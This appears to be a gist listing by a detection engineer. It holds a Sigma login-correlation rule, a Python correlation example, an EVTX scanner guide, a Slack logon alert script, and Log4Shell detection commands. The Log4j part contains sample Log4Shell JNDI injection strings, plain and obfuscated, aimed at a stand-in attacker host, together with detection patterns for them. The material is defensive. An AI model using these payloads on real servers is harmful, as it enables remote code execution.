Florian Roth (Neo23x0)

Neo23x0 / sigma_correlation_failed_login_success.yml
Last active December 4, 2023 10:00
Sigma - Correlation Rule
title: Correlation - Multiple Failed Logins Followed by Successful Login
id: b180ead8-d58f-40b2-ae54-c8940995b9b6
status: experimental
description: Detects multiple failed logins by a single user followed by a successful login of that user
author: Florian Roth (Nextron Systems)
date: 2023/06/16
type: temporal
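As an added example (not part of the gist), the temporal correlation the rule title describes, run over constructed Windows Security events with the field names Sigma uses (EventID 4625 = failed logon, 4624 = successful logon). The preview ends at type: temporal, so the failure threshold, the time window and the field names are assumptions here, not the rule's actual conditions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_LOGON = 4625   # Windows Security: an account failed to log on
SUCCESS_LOGON = 4624  # Windows Security: an account was successfully logged on

# Constructed sample events (not from the gist or from a real system).
SAMPLE_EVENTS = [
    # alice: three failures, then a success 20 seconds later -> should alert
    {"ts": "2023-06-16T10:00:00", "EventID": 4625, "TargetUserName": "alice", "IpAddress": "10.0.0.5"},
    {"ts": "2023-06-16T10:00:30", "EventID": 4625, "TargetUserName": "alice", "IpAddress": "10.0.0.5"},
    {"ts": "2023-06-16T10:01:00", "EventID": 4625, "TargetUserName": "alice", "IpAddress": "10.0.0.5"},
    {"ts": "2023-06-16T10:01:20", "EventID": 4624, "TargetUserName": "alice", "IpAddress": "10.0.0.5"},
    # bob: only two failures before the success -> below the threshold
    {"ts": "2023-06-16T10:02:00", "EventID": 4625, "TargetUserName": "bob", "IpAddress": "10.0.0.7"},
    {"ts": "2023-06-16T10:02:10", "EventID": 4625, "TargetUserName": "bob", "IpAddress": "10.0.0.7"},
    {"ts": "2023-06-16T10:02:20", "EventID": 4624, "TargetUserName": "bob", "IpAddress": "10.0.0.7"},
    # carol: three failures, but the success comes an hour later -> outside the window
    {"ts": "2023-06-16T09:00:00", "EventID": 4625, "TargetUserName": "carol", "IpAddress": "10.0.0.9"},
    {"ts": "2023-06-16T09:00:05", "EventID": 4625, "TargetUserName": "carol", "IpAddress": "10.0.0.9"},
    {"ts": "2023-06-16T09:00:10", "EventID": 4625, "TargetUserName": "carol", "IpAddress": "10.0.0.9"},
    {"ts": "2023-06-16T10:00:10", "EventID": 4624, "TargetUserName": "carol", "IpAddress": "10.0.0.9"},
    # dave: success first, failures afterwards -> wrong order, no alert
    {"ts": "2023-06-16T10:03:00", "EventID": 4624, "TargetUserName": "dave", "IpAddress": "10.0.0.11"},
    {"ts": "2023-06-16T10:03:10", "EventID": 4625, "TargetUserName": "dave", "IpAddress": "10.0.0.11"},
    {"ts": "2023-06-16T10:03:20", "EventID": 4625, "TargetUserName": "dave", "IpAddress": "10.0.0.11"},
    {"ts": "2023-06-16T10:03:30", "EventID": 4625, "TargetUserName": "dave", "IpAddress": "10.0.0.11"},
]


def correlate_failed_then_success(events, threshold=3, timespan_minutes=5):
    """Temporal correlation: at least `threshold` failed logons for one user, followed by a
    successful logon of the same user, all within `timespan_minutes`.
    threshold and timespan_minutes are assumed values; the gist preview does not show them.
    Events are sorted by timestamp so that the success must come *after* the failures."""
    window = timedelta(minutes=timespan_minutes)
    failures = defaultdict(list)  # user -> timestamps of failed logons seen so far
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        t = datetime.fromisoformat(ev["ts"])
        user = ev["TargetUserName"]
        if ev["EventID"] == FAILED_LOGON:
            failures[user].append(t)
        elif ev["EventID"] == SUCCESS_LOGON:
            # Only failures inside the window that ends at this success count.
            recent = [f for f in failures[user] if t - window <= f <= t]
            if len(recent) >= threshold:
                alerts.append({"user": user, "failed": len(recent),
                               "success_at": ev["ts"], "src": ev["IpAddress"]})
                failures[user].clear()  # one alert per burst, not one per later success
    return alerts


if __name__ == "__main__":
    for alert in correlate_failed_then_success(SAMPLE_EVENTS):
        print(alert)
```

Only alice triggers with the default values: bob stays below the threshold, carol's failures fall outside the window, and dave's failures come after the success. Widening the window to two hours makes carol fire as well, which is the knob to tune against a real baseline of forgotten passwords.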
Neo23x0 /
Last active May 12, 2024 12:09
Guide to Use Sigma EVTX Checker

Guide to Use Nextron's Sigma EVTX Checker

It is a fast Go-based scanner for Linux, Windows, and macOS that applies Sigma rules to EVTX files and outputs the matches as JSON.

Clone the Sigma Repository and cd into it

git clone
cd sigma
Neo23x0 /
Created December 18, 2022 18:48
My Link List
Neo23x0 /
Last active August 1, 2023 21:53
Collection of Deleted Articles on MDSec's Nighthawk
Neo23x0 /
Created September 11, 2022 21:22
Slack Hook - System Logon
#!/bin/bash
# Notify a Slack channel on each SSH logon. sshd sets SSH_CONNECTION to "client_ip client_port server_ip server_port".
# (The gist preview runs this with "bash -x"; xtrace would print the webhook URL to stderr, so it is dropped here.)
source=$(echo "${SSH_CONNECTION:-unknown}" | cut -d' ' -f 1)
geo=$(geoiplookup "$source" 2>/dev/null)
# The webhook URL is not shown in the preview; it is taken from SLACK_WEBHOOK_URL (assumed variable name).
curl -X POST --silent --data "payload={\"text\": \":bust_in_silhouette: SYSTEM: $HOSTNAME USER: $USER SOURCE: $source GEO: $geo\"}" "$SLACK_WEBHOOK_URL" > /dev/null
Neo23x0 / cyber-security-blogs.txt
Created September 10, 2022 13:49
Cyber Security Blogs
Neo23x0 /
Created March 5, 2022 12:49
Samples Signed with NVIDIA Certs
Neo23x0 /
Last active June 24, 2024 22:11
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against the Log4j RCE vulnerability CVE-2021-44228 (Log4Shell).

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in /var/log and all of its subfolders (-r); -I skips binary files and -i makes the match case-insensitive.

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log

Note that this pattern only matches the plain ${jndi: form (and its %7B URL-encoded brace). Payloads that spell "jndi" with nested lookups such as ${lower:j} or ${::-j}, or that are fully URL-encoded, are not caught by it.
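As an added example (not part of the gist), the grep pattern above transcribed to Python and run over constructed access-log lines, once as-is and once after a normalisation step that URL-decodes the line and collapses the single-character Log4j lookups (${lower:x}, ${upper:x}, ${::-x}, ${env:NAME:-x}) attackers use to spell "jndi" letter by letter. The normalisation goes beyond the gist's command; the sample lines and the hostname attacker.example are made up.

```python
import re
from urllib.parse import unquote

# The gist's grep -E pattern, transcribed to Python.
JNDI_PATTERN = re.compile(
    r'\$(\{|%7B)jndi:(ldaps?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+', re.IGNORECASE)

# Added normalisation (not in the gist): Log4j lookups that evaluate to one character and
# are used to obfuscate the "jndi" keyword: ${lower:J}, ${upper:j}, ${::-j}, ${env:NOPE:-j}.
SINGLE_CHAR_LOOKUP = re.compile(
    r'\$\{(?:(?:lower|upper):|::-|[a-z]+:[^{}]*:-)([^{}])\}', re.IGNORECASE)

# Constructed sample log lines (Apache combined format); not real traffic.
SAMPLE_LINES = [
    '10.0.0.1 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.2 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.3 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fb%7D HTTP/1.1" 404 12 "-" "curl/7.68.0"',
    '10.0.0.4 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}${lower:n}${::-d}${env:NOPE:-i}:ldap://attacker.example/c}"',
    '10.0.0.5 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 612 "-" "${${upper:j}ndi:rmi://attacker.example/d}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:06 +0000] "GET /docs/log4j-jndi-howto HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]


def normalize(line, max_rounds=10):
    """URL-decode once, then resolve nested single-character lookups until nothing changes."""
    text = unquote(line)
    for _ in range(max_rounds):
        new = SINGLE_CHAR_LOOKUP.sub(lambda m: m.group(1), text)
        if new == text:
            break
        text = new
    return text


def grep_plain(lines):
    """What the gist's egrep finds: 1-based numbers of lines matching the raw pattern."""
    return [i for i, line in enumerate(lines, 1) if JNDI_PATTERN.search(line)]


def grep_normalized(lines):
    """Same pattern applied after normalisation; also catches encoded and obfuscated payloads."""
    return [i for i, line in enumerate(lines, 1) if JNDI_PATTERN.search(normalize(line))]


if __name__ == "__main__":
    print("plain pattern hits:     ", grep_plain(SAMPLE_LINES))
    print("after normalisation:    ", grep_normalized(SAMPLE_LINES))
```

The raw pattern catches only the textbook payload on line 2. After decoding, lines 3 to 5 match as well, while line 6 (a URL that merely contains the word jndi) stays clean in both passes. In practice the decoding should run before the match whenever the logged field is attacker-controlled, which for Log4Shell means headers such as User-Agent, X-Forwarded-For and the request path.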
Neo23x0 /
Last active December 11, 2021 11:15
Minecraft with SEUS Shader - Guide
Neo23x0 /
Last active July 30, 2023 12:19
Offensive Research Guide to Help Defense Improve Detection

I've transformed this gist into a git repository.

Whenever you research a certain vulnerability, ask yourself these questions and please answer them for us:

Does the exploited service write a log?
(check ls -lrt /var/log or lsof +D /var/log/ or lsof | grep servicename)